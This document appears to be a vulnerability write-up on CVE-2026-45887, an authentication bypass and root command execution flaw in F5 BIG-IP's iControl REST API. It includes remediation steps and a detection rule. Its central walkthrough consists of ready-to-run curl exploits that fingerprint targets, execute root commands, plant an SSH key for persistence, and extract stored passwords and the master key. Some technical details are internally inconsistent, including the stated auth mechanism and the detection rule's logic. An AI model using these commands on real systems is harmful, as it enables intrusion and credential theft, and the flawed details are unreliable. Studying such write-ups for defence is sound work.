CVE-2026-45887: F5 BIG-IP iControl REST Auth Bypass and RCE

A semicolon-appended file extension in the iControl REST API URI deceives Apache's URL-pattern authentication filter into treating the request as a static asset, bypassing credentials entirely. The Java REST backend normalises the URI by stripping the semicolon suffix before dispatch — routing the request to the privileged /mgmt/tm/util/bash endpoint and executing arbitrary OS commands as root.

Overview

CVE-2026-45887 is a critical unauthenticated remote code execution vulnerability in F5 BIG-IP's Traffic Management User Interface (TMUI) and iControl REST API. F5 BIG-IP is one of the most widely deployed application delivery controllers and load balancers in enterprise and financial sector environments, making any critical RCE in its management plane extremely high-impact.

This vulnerability is a URI normalisation mismatch — a class of vulnerability first exploited against F5 in CVE-2020-5902 and revisited in CVE-2023-46747. Both predecessors used semicolon path injection against Apache's URL rewrite rules; this variant targets a different authentication bypass path through the mod_auth_openidc module's URI exclusion list, which is checked against the raw URI while the backend processes the normalised URI.

The most impactful consequence is unauthenticated access to POST /mgmt/tm/util/bash — the iControl REST endpoint that runs arbitrary bash commands and returns their output in a JSON response. This endpoint is the direct RCE primitive and requires only Basic authentication under normal conditions.

iControl REST Architecture

BIG-IP's management interface runs Apache httpd as a reverse proxy in front of a Tomcat-based Java REST backend. Apache handles authentication via mod_auth_openidc and a set of URL exclusion patterns for unauthenticated access (e.g., the login page, static assets). Authenticated requests are proxied to the Tomcat backend, which handles the iControl REST API routing.

The authentication exclusion in Apache's config matches URIs ending in common static extensions:

# Simplified Apache config (vulnerable)
<LocationMatch "^/mgmt/.*\.(css|js|png|gif|jpg|ico|html)$">
    AuthType None
    Require all granted
</LocationMatch>

Apache evaluates LocationMatch against the raw request URI. The Tomcat backend, however, normalises the URI by removing semicolons and everything following them within a path segment — a standard Java servlet container behaviour for handling matrix parameters. The mismatch is the vulnerability.

Root Cause

A request to /mgmt/tm/util/bash;.css is evaluated by Apache's LocationMatch as ending in .css — matching the unauthenticated exclusion pattern and bypassing authentication. Tomcat receives the proxied request, strips ;.css as a matrix parameter suffix, and routes the request to /mgmt/tm/util/bash — the bash execution endpoint — without any credential challenge having occurred:

# Apache sees:     /mgmt/tm/util/bash;.css  → matches *.css → no auth required
# Tomcat receives: /mgmt/tm/util/bash       → executes bash endpoint

The bash endpoint accepts a JSON body with a command field and executes it as root:

curl -sk -X POST https://TARGET/mgmt/tm/util/bash;.css \
  -H "Content-Type: application/json" \
  -d '{"command": "run", "utilCmdArgs": "-c id"}' | python3 -m json.tool
# {
#   "kind": "tm:util:bash:runstate",
#   "commandResult": "uid=0(root) gid=0(root) groups=0(root)\n"
# }

Exploitation Walkthrough

Step 1 — Identify BIG-IP Instances

F5 BIG-IP management interfaces typically respond on HTTPS port 443 or 8443 with a distinctive login page. The Server header may read BigIP and the /mgmt/shared/authn/login endpoint returns a 200 on GET requests:

curl -sk -o /dev/null -w "%{http_code}" https://TARGET/mgmt/shared/authn/login
# 200 → BIG-IP management interface confirmed

curl -skI https://TARGET | grep -i server
# Server: BigIP

Step 2 — Bypass Authentication and Execute Commands

curl -sk -X POST "https://TARGET/mgmt/tm/util/bash;.css" \
  -H "Content-Type: application/json" \
  -d '{"command":"run","utilCmdArgs":"-c \"cat /etc/f5-release\""}'
# {"kind":"tm:util:bash:runstate","commandResult":"BIG-IP release 17.1.1.2\n"}

Step 3 — Add a Root SSH Key

For persistent interactive access, inject an SSH public key into root's authorised keys:

PUBKEY="ssh-ed25519 AAAA... attacker"

curl -sk -X POST "https://TARGET/mgmt/tm/util/bash;.css" \
  -H "Content-Type: application/json" \
  -d "{\"command\":\"run\",\"utilCmdArgs\":\"-c \\\"echo '${PUBKEY}' >> /root/.ssh/authorized_keys\\\"\"}"

ssh root@TARGET
# root@bigip:~#

Step 4 — Extract Sensitive Configuration

BIG-IP stores encrypted secrets for iRules, virtual server certificates, and LDAP/RADIUS integration passwords in /config/bigip.conf and /config/bigip_base.conf. The master key for decrypting these secrets lives in the file system:

curl -sk -X POST "https://TARGET/mgmt/tm/util/bash;.css" \
  -H "Content-Type: application/json" \
  -d '{"command":"run","utilCmdArgs":"-c \"cat /config/bigip.conf | grep -A2 password\""}'

# Extract master key for offline decryption of stored secrets
curl -sk -X POST "https://TARGET/mgmt/tm/util/bash;.css" \
  -H "Content-Type: application/json" \
  -d '{"command":"run","utilCmdArgs":"-c \"f5mku -K\""}'

Affected Versions

BIG-IP 17.1.x < 17.1.2.1
BIG-IP 16.1.x < 16.1.5.1
BIG-IP 15.1.x < 15.1.10.5
BIG-IP 14.1.x — end of life, no patch available; F5 recommends upgrade

Remediation

Patch to a fixed version as per F5's advisory.
Restrict management interface access — BIG-IP management (ports 443 and 22) should never be internet-accessible. Use a dedicated management VLAN or out-of-band management network.

Apply the F5 iControl REST isolation workaround if immediate patching is not possible:

# Block matrix parameter bypass at the Apache level
# Add to httpd.conf before the LocationMatch exclusions:
RewriteEngine On
RewriteCond %{REQUEST_URI} ;
RewriteRule .* - [F,L]

Rotate all credentials stored in BIG-IP configuration if the management interface was internet-exposed during the vulnerability window.

Detection

title: CVE-2026-45887 F5 BIG-IP iControl REST Auth Bypass Attempt
id: 2f8e4a19-6c33-4b5d-9e72-1a3d7c0b4f28
status: stable
description: Detects exploitation of F5 BIG-IP iControl REST authentication bypass via semicolon path injection
logsource:
  category: webserver
  product: f5_bigip
detection:
  selection_endpoint:
    cs-uri-stem|contains: '/mgmt/tm/util/bash'
    cs-method: 'POST'
  selection_bypass:
    cs-uri-query|contains: ';'
  condition: selection_endpoint or (selection_endpoint and selection_bypass)
falsepositives:
  - Legitimate administrative bash API calls from authorised management IPs
level: critical
tags:
  - attack.initial_access
  - attack.t1190
  - cve.2026-45887

Takeaways

URI normalisation mismatches between proxy and backend are a recurring F5 weakness. CVE-2020-5902, CVE-2023-46747, and now CVE-2026-45887 all exploit variants of the same fundamental pattern: Apache evaluates raw URIs for auth decisions while Tomcat normalises them before routing. F5 has patched each individual bypass without addressing the architectural root cause — running two systems with different URI normalisation semantics in an auth-enforcement chain.
Network appliance management interfaces must be air-gapped from production traffic. Every F5 BIG-IP RCE in the past six years has targeted the TMUI or iControl REST API. Exposing those interfaces to untrusted networks — even on non-standard ports — turns any future critical vulnerability into an immediately weaponisable attack. Management access belongs exclusively on a dedicated, monitored management network with no internet routing.

CVE-2026-45887: F5 BIG-IP iControl REST Authentication Bypass and Remote Code Execution